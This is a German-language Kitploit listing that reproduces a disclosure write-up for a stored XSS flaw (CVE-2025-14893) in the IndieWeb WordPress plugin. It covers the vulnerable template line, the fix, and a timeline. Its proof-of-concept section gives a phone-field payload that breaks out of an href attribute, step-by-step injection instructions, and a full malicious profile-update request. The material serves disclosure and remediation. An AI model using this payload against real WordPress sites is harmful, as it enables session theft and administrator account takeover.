Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14893 — Authentifiziertes gespeichertes Cross-Site Scripting (XSS) im IndieWeb WordPress Plugin | Kitploit
Tools/GitHubGitHub/d3kc4rt1/cve-2025-14893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

Authentifiziertes gespeichertes Cross-Site Scripting (XSS) im IndieWeb WordPress Plugin

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-14893: Authentifiziertes gespeichertes Cross-Site Scripting (XSS) im IndieWeb WordPress Plugin

Haftungsausschluss: Dieses Repository wird nur für Bildungszwecke und ethische Offenlegung erstellt. Die Schwachstelle wurde verantwortungsvoll an den Anbieter gemeldet und behoben. Verwenden Sie diese Informationen nicht, um Systeme ohne entsprechende Autorisierung auszunutzen.

Zusammenfassung

Eine gespeicherte Cross-Site-Scripting (XSS)-Schwachstelle wurde im IndieWeb-Plugin für WordPress (Versionen <= 4.0.5) entdeckt. Diese Schwachstelle ermöglicht es authentifizierten Angreifern mit Autor-Rechten oder höher, bösartiges JavaScript in das „Telefon“-Feld ihres Benutzerprofils einzuschleusen.

Wenn das „Autor-Profil-H-Card-Widget“ auf der Frontend-Seite angezeigt wird, wird das eingeschleuste Skript ohne ordnungsgemäße Bereinigung dargestellt. Wenn ein Benutzer mit hohen Berechtigungen, z. B. ein Administrator, auf den manipulierten Link klickt, wird das Skript in seinem Browserkontext ausgeführt. Dies kann zu Session-Hijacking, unbefugten administrativen Aktionen und vollständiger Account-Übernahme (Account Takeover, ATO) führen.

Schwachstellenübersicht

  • CVE-ID: CVE-2025-14893
  • Produkt: IndieWeb (WordPress Plugin)
  • Betroffene Versionen: <= 4.0.5
  • Schwachstellentyp: Stored Cross-Site Scripting (XSS) (CWE-79)
  • Erforderliche Berechtigungen: Authentifiziert (Autor-Ebene und höher)

Technische Detailanalyse & Ursache

Das Kernproblem liegt in der unsicheren Handhabung von Benutzermetadaten im Templating-System des Plugins, insbesondere darin, dass die integrierten Escaping-Funktionen von WordPress nicht verwendet werden.

Gefährdete Datei: templates/h-card.php (Zeile 27)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

Der Fehler: Das Plugin gibt die tel-Metadaten des Benutzers direkt innerhalb des href-HTML-Attributs mit echo aus, ohne sie in esc_attr() zu verpacken. Dadurch kann ein Angreifer eine manipulierte Zeichenfolge bereitstellen, die ein doppeltes Anführungszeichen (") enthält, um das href-Attribut vorzeitig zu schließen, gefolgt von beliebigen HTML-Attributen (wie style oder onclick).

Geschäftsauswirkungen

  • Account-Übernahme (ATO): Wenn ein Administrator mit dem manipulierten Element interagiert, kann das JavaScript des Angreifers Sitzungscookies stehlen oder administrative AJAX-Anfragen ausführen, wodurch der Angreifer die vollständige Kontrolle über die WordPress-Website erhält.
  • Reputationsschaden: Der Angreifer kann die sichtbaren Elemente der Seite verändern (Defacement) oder legitime Besucher auf bösartige Websites Dritter umleiten.

Proof of Concept (PoC)

Voraussetzungen

  1. WordPress installiert mit aktiviertem IndieWeb <= 4.0.5.
  2. Ein Angreiferkonto mit der Autor-Rolle.
  3. Das „Autor-Profil-H-Card-Widget“ zu einem sichtbaren Frontend-Bereich hinzugefügt (z. B. Sidebar).

Ausführungsschritte

  1. Melden Sie sich als Autor im WordPress-Dashboard an.
  2. Navigieren Sie zu Profil (/wp-admin/profile.php).
  3. Scrollen Sie nach unten zum Telefon-Feld.
  4. Injecten Sie die folgende Payload (die das href-Attribut verlässt):
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. Klicken Sie auf Profil aktualisieren.
  6. Wichtiger Schritt: Erstellen und veröffentlichen Sie einen neuen Beitrag. Das anfällige Widget wird nur auf einzelnen Beitragsseiten (is_single()) gerendert, um die Autoreninformationen anzuzeigen.
  7. Auslöser: Wenn ein Administrator den veröffentlichten Beitrag im Frontend besucht und auf den neu gestalteten „Click_Me“-Telefonbutton klickt, wird die XSS-Payload (die das Sitzungscookie alarmiert) ausgeführt.

Beispiel einer bösartigen HTTP-Anfrage (Profilaktualisierung)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

Behebung

Um diese Schwachstelle zu beheben, müssen die Plugin-Entwickler die Ausgabe ordnungsgemäß mit den WordPress-Funktionen esc_attr() und esc_html() escapen.

Beispiel für korrigierten Code:

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

Zeitplan

  • Datum (2026-03-03): An Wordfence gemeldet.
  • Datum (2026-03-20): Schwachstelle behoben / Öffentliche Offenlegung.

Referenzen & Danksagungen

  • Wordfence Vulnerability Database
  • CVE-2025-14893 on NVD
  • IndieWeb Plugin on WordPress.org
Tool herunterladen